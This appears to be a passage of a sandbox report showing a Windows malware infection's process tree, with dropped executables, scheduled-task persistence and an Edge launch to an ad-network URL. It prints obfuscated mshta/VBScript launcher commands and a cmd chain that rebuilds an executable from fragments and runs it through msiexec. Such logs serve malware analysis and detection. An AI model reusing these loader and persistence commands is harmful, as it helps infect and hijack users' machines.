C:\Users\Admin\Pictures\Adobe Films\FVFTOIzhXOwuCYMlRx7WbAzn.exe"C:\Users\Admin\Pictures\Adobe Films\FVFTOIzhXOwuCYMlRx7WbAzn.exe"9⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=110⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"11⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST8⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST8⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\Tr_Mw4Yk4p1Re1ouatYAWQUu.exe"C:\Users\Admin\Pictures\Adobe Films\Tr_Mw4Yk4p1Re1ouatYAWQUu.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\DvVQQq1XPMV9rCht2f5DtVr7.exe"C:\Users\Admin\Pictures\Adobe Films\DvVQQq1XPMV9rCht2f5DtVr7.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\VM2skHGFpeBDBysR6622fBC8.exe"C:\Users\Admin\Pictures\Adobe Films\VM2skHGFpeBDBysR6622fBC8.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\K0TibwmFldhZ549RofY1erc4.exe"C:\Users\Admin\Pictures\Adobe Films\K0TibwmFldhZ549RofY1erc4.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5124 -s 2368⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\Hj5Pq1vV39n8G1DTpop2wdl2.exe"C:\Users\Admin\Pictures\Adobe Films\Hj5Pq1vV39n8G1DTpop2wdl2.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Adobe Films\nXZzPjm8z9HP4_SUYbwTPDKm.exe"C:\Users\Admin\Pictures\Adobe Films\nXZzPjm8z9HP4_SUYbwTPDKm.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\nXZzPjm8z9HP4_SUYbwTPDKm.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\nXZzPjm8z9HP4_SUYbwTPDKm.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\nXZzPjm8z9HP4_SUYbwTPDKm.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\nXZzPjm8z9HP4_SUYbwTPDKm.exe" ) do taskkill -im "%~NxK" -F9⤵
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F12⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ("WSCRIPt.SheLl" ). rUn ("C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl + _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl+ _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "13⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\N3V4H8H.SXY13⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "nXZzPjm8z9HP4_SUYbwTPDKm.exe" -F10⤵
- Executes dropped EXE
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\M35Lp9gfDfkC86gCoe6z36z0.exe"C:\Users\Admin\Pictures\Adobe Films\M35Lp9gfDfkC86gCoe6z36z0.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\Pictures\Adobe Films\4kw4eKu9gndEHqJKFw6yErfF.exe"C:\Users\Admin\Pictures\Adobe Films\4kw4eKu9gndEHqJKFw6yErfF.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-VE0ST.tmp\4kw4eKu9gndEHqJKFw6yErfF.tmp"C:\Users\Admin\AppData\Local\Temp\is-VE0ST.tmp\4kw4eKu9gndEHqJKFw6yErfF.tmp" /SL5="$6014C,506127,422400,C:\Users\Admin\Pictures\Adobe Films\4kw4eKu9gndEHqJKFw6yErfF.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-IFBHT.tmp\ShareFolder.exe"C:\Users\Admin\AppData\Local\Temp\is-IFBHT.tmp\ShareFolder.exe" /S /UID=27109⤵
-
C:\Program Files\MSBuild\CPWRENHLDH\foldershare.exe"C:\Program Files\MSBuild\CPWRENHLDH\foldershare.exe" /VERYSILENT10⤵
-
C:\Users\Admin\AppData\Local\Temp\f6-2b359-4c1-2cb81-16e1ec8b1f461\Loraebaesura.exe"C:\Users\Admin\AppData\Local\Temp\f6-2b359-4c1-2cb81-16e1ec8b1f461\Loraebaesura.exe"10⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e611⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:212⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2540 /prefetch:812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:312⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3728 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3736 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5316 /prefetch:212⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5188 /prefetch:812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5188 /prefetch:812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2484 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5292 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3464 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5732 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5276 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5628 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6020 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3080 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4028 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6480 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5876 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5380 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6468 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5600 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6024 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4108 /prefetch:812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5240 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6324 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5448 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6760 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4124 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5280 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7060 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6648 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6344 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6616 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6704 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6668 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6572 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1656 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7328 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7388 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6344 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6864 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7020 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7544 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6580 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4240 /prefetch:112⤵
-
